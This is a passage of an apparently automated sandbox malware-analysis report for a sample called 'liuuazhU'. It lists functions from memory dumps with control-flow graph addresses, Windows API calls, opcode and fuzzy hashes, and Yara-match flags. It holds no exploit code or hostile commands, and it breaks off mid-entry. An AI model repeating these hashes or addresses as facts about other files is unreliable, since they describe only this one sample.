                                                                                        • Snapshot File: hcaresult_6_2_20190000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 03c1cf3a920074e03988159ace8b0939abdaae21ae599aa8bd7bc29d5717f85e
                                                                                        • Instruction ID: 7323a108d1c97a66fb2760e9e5f479a87e7120683ac0f6ad80fe8a9acc84263f
                                                                                        • Opcode Fuzzy Hash: 03c1cf3a920074e03988159ace8b0939abdaae21ae599aa8bd7bc29d5717f85e
                                                                                        • Instruction Fuzzy Hash: A5F17C74E00228CFDB64DFA5C994BEDBBB2BB88300F1081AAD909A7354DB755E85DF50
                                                                                        Function 20D15FA0 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 146608c47e32e3b5ee9c5af4b0e1c721f682c9246c0cde01f58911d3bfeb526c
                                                                                        • Instruction ID: 24acaf59e96dce1963dce8ba35613815b7e7465112fd2792db068d251f8aaf84
                                                                                        • Opcode Fuzzy Hash: 146608c47e32e3b5ee9c5af4b0e1c721f682c9246c0cde01f58911d3bfeb526c
                                                                                        • Instruction Fuzzy Hash: F5F18E74E01228CFDB64DFA5C994B9DBBB2AF98300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D1F570 Relevance: .2, Instructions: 227COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e42ec5addb9d889803c34167b949fb61a7309555c0c09d1e03b55ec3f100f2c8
                                                                                        • Instruction ID: 4b70a479534f17e07e13f89eb7513f60beec583a4070c7161eddfc20368b2930
                                                                                        • Opcode Fuzzy Hash: e42ec5addb9d889803c34167b949fb61a7309555c0c09d1e03b55ec3f100f2c8
                                                                                        • Instruction Fuzzy Hash: 5AB1A1B4E012298FEB64CF6AD984B9DFBF2BF89300F14C1A9D448A7254DB345A85CF51
                                                                                        Function 20D1E379 Relevance: .2, Instructions: 188COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f855c09201359145b8ef098280a4fca00ab81d0cef27d56190ac96b78782497e
                                                                                        • Instruction ID: 94f2a7473260a0bebf1c56c57d45ba9145ba164819798211c9c6d4d45cb0db4a
                                                                                        • Opcode Fuzzy Hash: f855c09201359145b8ef098280a4fca00ab81d0cef27d56190ac96b78782497e
                                                                                        • Instruction Fuzzy Hash: 48919075E012288FDB65CFA6D990BDDBBB2AF89300F1480EAD40DA7250EB355E85CF50
                                                                                        Function 20D1F569 Relevance: .2, Instructions: 164COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 563d2d84a18df9836e2885ac5b3a009df1294f7d17a3703fc750c0bbd693415b
                                                                                        • Instruction ID: f9b79f8de88b195195da5a82fe2f4ccc6c2d3a5114280e7a355220174827e26c
                                                                                        • Opcode Fuzzy Hash: 563d2d84a18df9836e2885ac5b3a009df1294f7d17a3703fc750c0bbd693415b
                                                                                        • Instruction Fuzzy Hash: E571A4B5E016288FEB68CF6AD844B9DFAF2AF89300F14C1E9D44DA7254DB744A85CF11
                                                                                        Function 20D15F90 Relevance: .1, Instructions: 109COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aec3b2f2f78c088dc542eff464c87fda9e979214445414aff832e250e9a3e608
                                                                                        • Instruction ID: 3c94fd7154805635713f2424e72594a5a0f3e27eca024a34c2d98e9be957807b
                                                                                        • Opcode Fuzzy Hash: aec3b2f2f78c088dc542eff464c87fda9e979214445414aff832e250e9a3e608
                                                                                        • Instruction Fuzzy Hash: 0641E274E012188FEB64CFBAD8507DEFBF2AF89304F1090AAD508A7251DB345A86CF55
                                                                                        Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 682 40cbf7-40cc06 683 40cc08-40cc14 682->683 684 40cc2f 682->684 683->684 685 40cc16-40cc1d 683->685 686 40cc33-40cc3d call 40d534 684->686 685->684 687 40cc1f-40cc2d 685->687 690 40cc47 686->690 691 40cc3f-40cc46 call 40cbb4 686->691 687->686 692 40cc47 call 41087e 690->692 691->690 694 40cc4c-40cc4e 692->694 696 40cc50-40cc57 call 40cbb4 694->696 697 40cc58-40cc68 call 4129c9 call 411a15 694->697 696->697 704 40cc72-40cc82 GetCommandLineA call 412892 697->704 705 40cc6a-40cc71 call 40e79a 697->705 710 40cc87 call 4127d7 704->710 705->704 711 40cc8c-40cc8e 710->711 712 40cc90-40cc97 call 40e79a 711->712 713 40cc98-40cc9f call 41255f 711->713 712->713 718 40cca1-40cca8 call 40e79a 713->718 719 40cca9-40ccb3 call 40e859 713->719 718->719 724 40ccb5-40ccbb call 40e79a 719->724 725 40ccbc-40ccd3 call 4019f0 719->725 724->725 729 40ccd8-40cce2 725->729 730 40cce4-40cce5 call 40ea0a 729->730 731 40ccea-40cd2e call 40ea36 call 40e21d 729->731 730->731
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                        • String ID:
                                                                                        • API String ID: 2598563909-0
                                                                                        • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                        • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                                        • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                        • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C
                                                                                        Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1316 4018f0-4018fa 1317 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 1316->1317 1318 4018fc-401900 1316->1318 1321 401940-401949 GetLastError 1317->1321 1322 401996-40199a 1317->1322 1323 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 1321->1323 1324 40198d-40198f 1321->1324 1323->1324 1324->1322 1326 401991 call 401030 1324->1326 1326->1322
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3322701435-0
                                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                        Function 210149DC Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1329 210149dc-21014a6f GetCurrentProcess 1333 21014a71-21014a77 1329->1333 1334 21014a78-21014aac GetCurrentThread 1329->1334 1333->1334 1335 21014ab5-21014ae9 GetCurrentProcess 1334->1335 1336 21014aae-21014ab4 1334->1336 1338 21014af2-21014b0d call 21014bbc 1335->1338 1339 21014aeb-21014af1 1335->1339 1336->1335 1342 21014b13-21014b42 GetCurrentThreadId 1338->1342 1339->1338 1343 21014b44-21014b4a 1342->1343 1344 21014b4b-21014bad 1342->1344 1343->1344
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 21014A5E
                                                                                        • GetCurrentThread.KERNEL32 ref: 21014A9B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 21014AD8
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 21014B31
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 878859262c0c52ba6fad88bffe27b5e44fb915ce19f09ba45429ee191ba99375
                                                                                        • Instruction ID: 514bce16db16a77b72e888d865fb6354785dea3fdf81afbd555d352a821738f8
                                                                                        • Opcode Fuzzy Hash: 878859262c0c52ba6fad88bffe27b5e44fb915ce19f09ba45429ee191ba99375
                                                                                        • Instruction Fuzzy Hash: 615146B09006098FDB15CFA9D988BEEBBF1EF88304F24C169D019A7360D7749945CF69
                                                                                        Function 210149E0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1351 210149e0-21014a6f GetCurrentProcess 1355 21014a71-21014a77 1351->1355 1356 21014a78-21014aac GetCurrentThread 1351->1356 1355->1356 1357 21014ab5-21014ae9 GetCurrentProcess 1356->1357 1358 21014aae-21014ab4 1356->1358 1360 21014af2-21014b0d call 21014bbc 1357->1360 1361 21014aeb-21014af1 1357->1361 1358->1357 1364 21014b13-21014b42 GetCurrentThreadId 1360->1364 1361->1360 1365 21014b44-21014b4a 1364->1365 1366 21014b4b-21014bad 1364->1366 1365->1366
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 21014A5E
                                                                                        • GetCurrentThread.KERNEL32 ref: 21014A9B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 21014AD8
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 21014B31
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: f9c590df0ee3920de35fd0eea3dad32afc987a435176818e2a6bca45018a641c
                                                                                        • Instruction ID: 4c22fb992c33f49245168a09d5a43cc838af2c62142a407e8c8e40ddf9ebf3b5
                                                                                        • Opcode Fuzzy Hash: f9c590df0ee3920de35fd0eea3dad32afc987a435176818e2a6bca45018a641c
                                                                                        • Instruction Fuzzy Hash: 495136B09007098FDB14CFAAD988BEEBBF1EF88314F24C169D519A7260D7749944CF69
                                                                                        Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1373 40af66-40af6e 1374 40af7d-40af88 call 40b84d 1373->1374 1377 40af70-40af7b call 40d2e3 1374->1377 1378 40af8a-40af8b 1374->1378 1377->1374 1381 40af8c-40af98 1377->1381 1382 40afb3-40afca call 40af49 call 40cd39 1381->1382 1383 40af9a-40afb2 call 40aefc call 40d2bd 1381->1383 1383->1382
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1411284514-0
                                                                                        • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                        • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                        • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                        • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                        Function 20D132D0 Relevance: 4.6, Strings: 3, Instructions: 820COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1657 20d132d0-20d137be 1732 20d13d10-20d13d45 1657->1732 1733 20d137c4-20d137d4 1657->1733 1738 20d13d51-20d13d6f 1732->1738 1739 20d13d47-20d13d4c 1732->1739 1733->1732 1734 20d137da-20d137ea 1733->1734 1734->1732 1736 20d137f0-20d13800 1734->1736 1736->1732 1737 20d13806-20d13816 1736->1737 1737->1732 1740 20d1381c-20d1382c 1737->1740 1750 20d13d71-20d13d7b 1738->1750 1751 20d13de6-20d13df2 1738->1751 1741 20d13e36-20d13e3b 1739->1741 1740->1732 1742 20d13832-20d13842 1740->1742 1742->1732 1744 20d13848-20d13858 1742->1744 1744->1732 1746 20d1385e-20d1386e 1744->1746 1746->1732 1747 20d13874-20d13884 1746->1747 1747->1732 1749 20d1388a-20d1389a 1747->1749 1749->1732 1752 20d138a0-20d13d0f 1749->1752 1750->1751 1756 20d13d7d-20d13d89 1750->1756 1757 20d13df4-20d13e00 1751->1757 1758 20d13e09-20d13e15 1751->1758 1765 20d13d8b-20d13d96 1756->1765 1766 20d13dae-20d13db1 1756->1766 1757->1758 1768 20d13e02-20d13e07 1757->1768 1763 20d13e17-20d13e23 1758->1763 1764 20d13e2c-20d13e2e 1758->1764 1763->1764 1777 20d13e25-20d13e2a 1763->1777 1764->1741 1765->1766 1779 20d13d98-20d13da2 1765->1779 1769 20d13db3-20d13dbf 1766->1769 1770 20d13dc8-20d13dd4 1766->1770 1768->1741 1769->1770 1781 20d13dc1-20d13dc6 1769->1781 1772 20d13dd6-20d13ddd 1770->1772 1773 20d13e3c-20d13e54 1770->1773 1772->1773 1778 20d13ddf-20d13de4 1772->1778 1783 20d13e67-20d13e98 call 20d14001 1773->1783 1784 20d13e56-20d13e66 1773->1784 1777->1741 1778->1741 1779->1766 1787 20d13da4-20d13da9 1779->1787 1781->1741 1791 20d13eab-20d13eb6 1783->1791 1792 20d13e9a-20d13ea5 1783->1792 1784->1783 1787->1741 1798 20d13f87-20d13fcc call 20d12d48 1791->1798 1799 20d13ebc-20d13f19 1791->1799 1792->1791 1797 20d13f2e-20d13f80 1792->1797 1797->1798 1817 20d13fdd-20d13feb 1798->1817 1818 20d13fce-20d13fdb 1798->1818 1808 20d13f22-20d13f2b 1799->1808 1825 20d13ff9 1817->1825 1826 20d13fed-20d13ff7 1817->1826 1824 20d13ffb-20d13ffe 1818->1824 1825->1824 1826->1824
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (o^q$$^q$$^q
                                                                                        • API String ID: 0-27156697
                                                                                        • Opcode ID: fd22bd291b6f48195610d75538ab53cccedbb566e41dec136ac69fc788363387
                                                                                        • Instruction ID: deb1c55b70a9181f3dd12d405b8b430ede40f3fc21689f30b5966560c9ac1047
                                                                                        • Opcode Fuzzy Hash: fd22bd291b6f48195610d75538ab53cccedbb566e41dec136ac69fc788363387
                                                                                        • Instruction Fuzzy Hash: 78727274A00218CFDB159BE8D894B9EBB76EF84300F2081A9D406AB3A5DE359D89DF51
                                                                                        Function 20D11079 Relevance: 2.7, Strings: 2, Instructions: 233COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2956 20d11079-20d11095 2957 20d11097-20d1109b 2956->2957 2958 20d1109d-20d1109f 2956->2958 2957->2958 2959 20d110a4-20d110af 2957->2959 2960 20d112b0-20d112b7 2958->2960 2961 20d110b5-20d110bc 2959->2961 2962 20d112b8 2959->2962 2963 20d11251-20d11257 2961->2963 2964 20d110c2-20d110d1 2961->2964 2966 20d112bd-20d112f5 2962->2966 2967 20d11259-20d1125b 2963->2967 2968 20d1125d-20d11261 2963->2968 2965 20d110d7-20d110e6 2964->2965 2964->2966 2974 20d110e8-20d110eb 2965->2974 2975 20d110fb-20d110fe 2965->2975 2981 20d112f7-20d112fc 2966->2981 2982 20d112fe-20d11302 2966->2982 2967->2960 2969 20d11263-20d11269 2968->2969 2970 20d112ae 2968->2970 2969->2962 2972 20d1126b-20d1126e 2969->2972 2970->2960 2972->2962 2976 20d11270-20d11285 2972->2976 2977 20d1110a-20d11110 2974->2977 2978 20d110ed-20d110f0 2974->2978 2975->2977 2979 20d11100-20d11103 2975->2979 2991 20d11287-20d1128d 2976->2991 2992 20d112a9-20d112ac 2976->2992 2983 20d11112-20d11118 2977->2983 2984 20d11128-20d11145 2977->2984 2985 20d111f1-20d111f7 2978->2985 2986 20d110f6 2978->2986 2987 20d11105 2979->2987 2988 20d11156-20d1115c 2979->2988 2993 20d11308-20d1130a 2981->2993 2982->2993 2994 20d1111a 2983->2994 2995 20d1111c-20d11126 2983->2995 3029 20d1114e-20d11151 2984->3029 2996 20d111f9-20d111ff 2985->2996 2997 20d1120f-20d11219 2985->2997 2990 20d1121c-20d11229 2986->2990 2987->2990 2998 20d11174-20d11186 2988->2998 2999 20d1115e-20d11164 2988->2999 3014 20d1122b-20d1122f 2990->3014 3015 20d1123d-20d1123f 2990->3015 3000 20d1129f-20d112a2 2991->3000 3001 20d1128f-20d1129d 2991->3001 2992->2960 3002 20d1130c-20d1131e 2993->3002 3003 20d1131f-20d11326 2993->3003 2994->2984 2995->2984 3005 20d11201 2996->3005 3006 20d11203-20d1120d 2996->3006 2997->2990 3019 20d11196-20d111b9 2998->3019 3020 20d11188-20d11194 2998->3020 3007 20d11166 2999->3007 3008 20d11168-20d11172 2999->3008 3000->2962 3009 20d112a4-20d112a7 3000->3009 3001->2962 3001->3000 3005->2997 3006->2997 3007->2998 3008->2998 3009->2991 3009->2992 3014->3015 3023 20d11231-20d11235 3014->3023 3024 20d11243-20d11246 3015->3024 3019->2962 3033 20d111bf-20d111c2 3019->3033 3030 20d111e1-20d111ef 3020->3030 3023->2962 3025 20d1123b 3023->3025 3024->2962 3026 20d11248-20d1124b 3024->3026 3025->3024 3026->2963 3026->2964 3029->2990 3030->2990 3033->2962 3034 20d111c8-20d111da 3033->3034 3034->3030
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,bq$,bq
                                                                                        • API String ID: 0-2699258169
                                                                                        • Opcode ID: 133f61c9a2d5dbdcbacb4e99628971b15a7e950a007a37dc158d2b62216763e2
                                                                                        • Instruction ID: abdf943a901e5c39f41e54dda496bcefcd147d092337860710573c27418660f1
                                                                                        • Opcode Fuzzy Hash: 133f61c9a2d5dbdcbacb4e99628971b15a7e950a007a37dc158d2b62216763e2
                                                                                        • Instruction Fuzzy Hash: 4781C038A052069FCB04CFE8E885A9EF7F2BF89204B24826DD515DB361CB31DC85CB55
                                                                                        Function 20D10BB8 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Hbq$Hbq
                                                                                        • API String ID: 0-4258043069
                                                                                        • Opcode ID: 10a554725f527bb61969a58ccdd08a52d925b643872994791d031f2de16bb19c
                                                                                        • Instruction ID: d8ddfcafdd4647f090359986e8b0d0112d9f078127b625149aa1b2013214de8d
                                                                                        • Opcode Fuzzy Hash: 10a554725f527bb61969a58ccdd08a52d925b643872994791d031f2de16bb19c
                                                                                        • Instruction Fuzzy Hash: 8761F1712092558FCB029FA4E844B6EBFF6BF85300F588959E845DB391DBB8CC81CB91
                                                                                        Function 2101D581 Relevance: 1.7, APIs: 1, Instructions: 236COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(?), ref: 2101D812
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 57cb42554dc761050db39bd0b226e5eae047cc83b56c11ae15a06dce630ec5d4
                                                                                        • Instruction ID: 01e130a127b4533ca34c06a9d9c238beebbd164c4fd14c4001b702325bda3040
                                                                                        • Opcode Fuzzy Hash: 57cb42554dc761050db39bd0b226e5eae047cc83b56c11ae15a06dce630ec5d4
                                                                                        • Instruction Fuzzy Hash: 52915470A00B498FDB25CF69C484B9ABBF1BF49300F00896ED48AE7654D739E949CF90
                                                                                        Function 2101F8F0 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2101FAB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: bcd1bc80e6085c215e224840a6bf0bb1fb1bc325392f590689a479091a0878d5
                                                                                        • Instruction ID: bfb220e7e7ad4cb804a49801964c6f2921f9308102bed01c38a9939a56941a15
                                                                                        • Opcode Fuzzy Hash: bcd1bc80e6085c215e224840a6bf0bb1fb1bc325392f590689a479091a0878d5
                                                                                        • Instruction Fuzzy Hash: AF717AB4D00218DFDF60CFA9D980ADDBBF1BB0A304F1491AAE858A7215D774AA85CF45
                                                                                        Function 21014C20 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 21014CF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 4f26cd4fd55a3fac2a1c812aaaeeabfcf2c8c6ef3106eb32003fe7ed789efa47
                                                                                        • Instruction ID: 2ffc023fa9835186c2c3a014136dcab652a8f6d01f604a3c7c918c7a1adcaf2a
                                                                                        • Opcode Fuzzy Hash: 4f26cd4fd55a3fac2a1c812aaaeeabfcf2c8c6ef3106eb32003fe7ed789efa47
                                                                                        • Instruction Fuzzy Hash: EA4155B9D002589FCF00CFA9D984ADEBFF5BB09310F14906AE918AB321D375A985CF54
                                                                                        Function 21014C28 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 21014CF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 5b7cb4800b1de85664a3beb0cb757eb9ef359187b46ea685e9f33d28d6386da2
                                                                                        • Instruction ID: 15d12277bf3489cd013991360fd23d4f2f7be831771bfcc7ac4622a3b3ec2e63
